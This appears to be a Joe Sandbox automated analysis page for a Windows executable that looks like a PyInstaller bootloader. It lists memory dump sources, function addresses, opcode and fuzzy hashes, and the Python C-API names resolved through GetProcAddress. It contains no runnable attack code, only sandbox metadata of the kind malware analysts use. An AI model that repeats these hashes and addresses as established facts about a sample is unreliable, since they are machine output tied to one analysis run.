Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: TMP
API String ID: 3215553584-3125297090
Opcode ID: ab01c8f9f33d9f34f1c73768ca5f7e92e4f1b42dfcb743eef36c8d357443a917
Instruction ID: 4f8a8e68b46645ac0f452220ce5dfedfb4e33ef0dfe9aa87dc303e59db6b7a4f
Opcode Fuzzy Hash: ab01c8f9f33d9f34f1c73768ca5f7e92e4f1b42dfcb743eef36c8d357443a917
Instruction Fuzzy Hash: 6E518411F08642C1FA5CBF26B92117AD2B2AF54BC4FE84436DE1E47BD9EE3CE4424624

Function 00007FF7691C2790 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 00007FF7691C2794

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
Instruction ID: 4a5494bded34c875a04e0ee98497c897292fc449b1416adddeb64b1c5f3db54d
Opcode Fuzzy Hash: fe1a72d78314f5032ff6e3f3402ce84269ae1386cefa971ca0fc6f511f9bbc55
Instruction Fuzzy Hash: 2FB09220E07A86C6EA0D3F217C8622462B87F88700FF48038C40E81320DE3C20A58B22

Function 00007FF7691B28C0 Relevance: .3, Instructions: 327COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
Instruction ID: cd7b02a8f311b6e40875f0bf9e9a932ed604f3b30018fddbca91a7224b1f5bca
Opcode Fuzzy Hash: b05403af9c31de739a9311cbf741df56ce5de8bb6a66a9cc9bcf40cf40427d0b
Instruction Fuzzy Hash: 0FD1B522A08642C5EB7CAF25E55027DA7B2AB65B48FB44635CD1D0769CDF3DD84BC320

Function 00007FF7691A8B20 Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
Instruction ID: 6e943149aeb82b4906a2ed2e72d0c6f1027bce3957e6d3ce9d9d1ed666e96121
Opcode Fuzzy Hash: b6de572fc7ea0867e481f021e98a3cee959a95ba6dd1d6718a656c0f39a4e480
Instruction Fuzzy Hash: 9EC1C2722142F18FD289FB29E45957A73E1F798309BD4402AEB8747F85CA3CE414D7A0

Function 00007FF7691B1F30 Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
Instruction ID: a9726a394100a506401ceae639d7563755900578dd1f127d6431d904e04f09ea
Opcode Fuzzy Hash: 54646038064d7a6353eabae39e6447674b1691c16f4822fec46df2a19c6da082
Instruction Fuzzy Hash: 4DB17D72A08785C5EB699F29E05023DBBB2E759B48FB40535CB4E47399CF39E44AC720

Function 00007FF7691BD880 Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
Instruction ID: 7b6d626157a4953f053095282924be9d71d07de5b75bfa0e93d1c0aa1b1774f7
Opcode Fuzzy Hash: c5cf27518f3756e107451e616d5c43acfc5497bdc9406be32d6656a2e3ee85f8
Instruction Fuzzy Hash: 8F81D7B6A0C781C6D77CDF29A450369AAA2FB46794FA44236DA8D47B9DCF3CD5008B10

Function 00007FF7691C5728 Relevance: .2, Instructions: 183COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
Instruction ID: 53f0404fec62dc7fd951f9e27dd8134238777519f10a32ec3e80cfa965a00067
Opcode Fuzzy Hash: 7a9558e86fa8b462753dac68b64cf5067dc6b1cda5ab5f882eee36bb89ede29b
Instruction Fuzzy Hash: C061EB22E0C292C6F76CAE29A45023DE6B1AF517B0FF44235D65DC66D5DE7DE8408F20

Function 00007FF7691B1484 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction ID: c044aa7dc3f7790e888c112f0200d45b201825167beaae3fd0bbb7dc7df3c1aa
Opcode Fuzzy Hash: 8e69dfdcc94a0aa650623f7423aa354004c1f2fa01d5c1268249020d4c21f447
Instruction Fuzzy Hash: 6651B676A18651C2E7299F29E044238B3B2EB4AB58FB94131CE4D07798CF3AEC53C750

Function 00007FF7691B0C64 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction ID: 4293852aaa45b831c14fccffad5fbac1bf981a9f9856f9c39f66963ac1cd4237
Opcode Fuzzy Hash: 68a3f5aab59b2fac328bd6ba34d5b1cd1fa94c6914f84dc4a79da3b9d8ff9a98
Instruction Fuzzy Hash: 76518076A18651C6E7289F29E250228B7B2EB48B68F744131CE5D477DDCB3AE843C790

Function 00007FF7691B1074 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction ID: 0e444ecba5b3aeb6fa7d8e29e39f8dda3fcfdd442bd03ba142e7b87beff382a9
Opcode Fuzzy Hash: 27099d1c67046ba5536a5c52bb1b19252402c8bb4a5167aa336477e7b6d5f807
Instruction Fuzzy Hash: 3F518036A18651C6E7289F29E04423CB3B2EB49F68FB64131CE4D47798CB3AE843C750

Function 00007FF7691B1280 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction ID: 62bf1dfb38da1384460cc57ca1aa64e7bfee8c412c50a73c82983635a75a3024
Opcode Fuzzy Hash: e734bc54909bdf7d9c6fd1772be64da5dc64d4f5bf3044a39ac3ba7850561882
Instruction Fuzzy Hash: F351A332B18651C5E7299F29E04023CA7B2EB45B68FB64131CE4D577ACDB3AE852C750

Function 00007FF7691B0A60 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction ID: b34474c0a69bb80e83de1f966a7bdcf0ec4a81b3544016cf41d5954b90d7102b
Opcode Fuzzy Hash: 3943df286285c50b07f09d339b53caaa0afa34ddfac4fad96d8a3f7ffd6ad23b
Instruction Fuzzy Hash: B2519136A18651C6E728AF29E250338B7B2EB44B58FB84131CE4D5779CDB3AE843C750

Function 00007FF7691B0E70 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction ID: 47ad73d5bd198edc365a319da9f89c75b59723dfe0447757496cf67b14cf26f9
Opcode Fuzzy Hash: dc981bf603441a130e1c6ba5e96f77be0c3c60e19ec03e3d560a09712d731568
Instruction Fuzzy Hash: EE51BE36A18A51C6E7289F29E14023CA7B2EB48F58FB54135CE4D5779CCB3AEC42C750

Function 00007FF7691B5040 Relevance: .1, Instructions: 138COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction ID: 16ea62473d637305824ed48a9159eee2e174e7dc6cd634dc143f0a2ac701f499
Opcode Fuzzy Hash: dde3b7cfbcf26fc8d7513faefc9a59c4b8821272907dfbb35b6db6355186da00
Instruction Fuzzy Hash: 5C410B52D4974AC4E95D6F1895107B896A2EF13BA0DF81270DD9ED73CFCC2D6D878120

Function 00007FF7691B91B0 Relevance: .1, Instructions: 126COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID: BoundaryDeleteDescriptorErrorLast
String ID:
API String ID: 2050971199-0
Opcode ID: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
Instruction ID: b6e40b3c358befd15e16e28af58e237d059e3afdface20892f382954183d1870
Opcode Fuzzy Hash: 8d7eb27f456b44a91f9c68f162ea9965681a4a0d7ad24d9c24e3bfc258020ebf
Instruction Fuzzy Hash: EA410562714A54C2EF08DF2AE924169F3A2BB48FD4B999432EE0D97B58DE3CC0428300

Function 00007FF7691B73F4 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
Instruction ID: b128b288ba0cbf61b1951abef876cbec74922edc27a95ae485e06bb8ef9c42b5
Opcode Fuzzy Hash: d47bd74fb6a019277da3c6b3819bfc69269ba7720235d09fb044e88388ffaf66
Instruction Fuzzy Hash: 5B31A931718B81C1E759BF25748013EEAE6AB84B90F644239EA5D53BD9DF3CD0019714

Function 00007FF7691C8880 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
Instruction ID: 75ea3fb266e7dfd02d3720874cf29f0caa2d4f1a1e95c0bc349e344b494e1431
Opcode Fuzzy Hash: b45f31a2a70b9ba878c3a12fffa6905b3575b51dadbfc3a0cbe7f45b87496cea
Instruction Fuzzy Hash: 27F06271B18295CFDBA99F29B842629B7E0F708380FD08039E68DC3F04D67C94608F14

Function 00007FF7691AC62C Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691DE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756660188.00007FF7691E4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756882544.00007FF7691E6000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7691a0000_VaTlw2kNGc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
Instruction ID: e80e3c6708a41bc991cd9543f1d33e8092f9b33ee473e3e3883c586c357cfcdf
Opcode Fuzzy Hash: 84fb9023dc3cd78644239ae856a17877a0dfc2a7c85af1c48b0789cc2cde0ccb
Instruction Fuzzy Hash: BFA0022195DC26D4EA4CEF04FA50135F339FB60700BE01031D00D815A19F3CB800C730

Function 00007FF7691A50B0 Relevance: 157.9, APIs: 44, Strings: 46, Instructions: 364libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A50C0
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5101
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5126
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A514B
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5173
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A519B
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A51C3
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A51EB
GetProcAddress.KERNEL32(?,00007FF7691A5C57,?,00007FF7691A308E), ref: 00007FF7691A5213

Strings

PySys_SetObject, xrefs: 00007FF7691A5669, 00007FF7691A5685
PyUnicode_AsUTF8, xrefs: 00007FF7691A5691, 00007FF7691A56AD
PyErr_Fetch, xrefs: 00007FF7691A52F9, 00007FF7691A5315
PyUnicode_Join, xrefs: 00007FF7691A5759, 00007FF7691A5775
Py_DecodeLocale, xrefs: 00007FF7691A50F7, 00007FF7691A5113
PyObject_CallFunctionObjArgs, xrefs: 00007FF7691A5529, 00007FF7691A5545
PyEval_EvalCode, xrefs: 00007FF7691A53C1, 00007FF7691A53DD
PyConfig_Read, xrefs: 00007FF7691A5231, 00007FF7691A524D
PyModule_GetDict, xrefs: 00007FF7691A54D9, 00007FF7691A54F5
Failed to get address for %hs, xrefs: 00007FF7691A50D9
PyUnicode_Replace, xrefs: 00007FF7691A5781, 00007FF7691A579D
PyImport_ExecCodeModule, xrefs: 00007FF7691A5411, 00007FF7691A542D
PyObject_CallFunction, xrefs: 00007FF7691A5501, 00007FF7691A551D
Py_PreInitialize, xrefs: 00007FF7691A51B9, 00007FF7691A51D5
PyUnicode_FromFormat, xrefs: 00007FF7691A5709, 00007FF7691A5725
PyPreConfig_InitIsolatedConfig, xrefs: 00007FF7691A55C9, 00007FF7691A55E5
PyErr_Restore, xrefs: 00007FF7691A5399, 00007FF7691A53B5
Py_IsInitialized, xrefs: 00007FF7691A5191, 00007FF7691A51AD
PyConfig_InitIsolatedConfig, xrefs: 00007FF7691A5209, 00007FF7691A5225
PyErr_Print, xrefs: 00007FF7691A5371, 00007FF7691A538D
PyRun_SimpleStringFlags, xrefs: 00007FF7691A55F1, 00007FF7691A560D
PyMarshal_ReadObjectFromString, xrefs: 00007FF7691A5489, 00007FF7691A54A5
PyUnicode_FromString, xrefs: 00007FF7691A5731, 00007FF7691A574D
PyObject_Str, xrefs: 00007FF7691A55A1, 00007FF7691A55BD
GetProcAddress, xrefs: 00007FF7691A50E0
PyConfig_Clear, xrefs: 00007FF7691A51E1, 00007FF7691A51FD
Py_ExitStatusException, xrefs: 00007FF7691A511C, 00007FF7691A5138
Py_InitializeFromConfig, xrefs: 00007FF7691A5169, 00007FF7691A5185
PyObject_SetAttrString, xrefs: 00007FF7691A5579, 00007FF7691A5595
PyImport_ImportModule, xrefs: 00007FF7691A5439, 00007FF7691A5455
PyImport_AddModule, xrefs: 00007FF7691A53E9, 00007FF7691A5405
PyObject_GetAttrString, xrefs: 00007FF7691A5551, 00007FF7691A556D
Py_Finalize, xrefs: 00007FF7691A5141, 00007FF7691A515D
PyErr_Clear, xrefs: 00007FF7691A52D1, 00007FF7691A52ED
PySys_GetObject, xrefs: 00007FF7691A5641, 00007FF7691A565D
PyUnicode_Decode, xrefs: 00007FF7691A56B9, 00007FF7691A56D5
PyConfig_SetWideStringList, xrefs: 00007FF7691A52A9, 00007FF7691A52C5
PyUnicode_DecodeFSDefault, xrefs: 00007FF7691A56E1, 00007FF7691A56FD
PyMem_RawFree, xrefs: 00007FF7691A54B1, 00007FF7691A54CD
PyConfig_SetBytesString, xrefs: 00007FF7691A5259, 00007FF7691A5275
PyErr_Occurred, xrefs: 00007FF7691A5349, 00007FF7691A5365
PyList_Append, xrefs: 00007FF7691A5461, 00007FF7691A547D
PyConfig_SetString, xrefs: 00007FF7691A5281, 00007FF7691A529D
PyStatus_Exception, xrefs: 00007FF7691A5619, 00007FF7691A5635
PyErr_NormalizeException, xrefs: 00007FF7691A5321, 00007FF7691A533D
Py_DecRef, xrefs: 00007FF7691A50B6, 00007FF7691A50D2

Memory Dump Source

Source File: 00000000.00000002.1756438271.00007FF7691A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7691A0000, based on PE: true

Associated: 00000000.00000002.1756383463.00007FF7691A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1756522742.00007FF7691CB000.00000002.00000001.01000000.00000003.sdmpDownload File
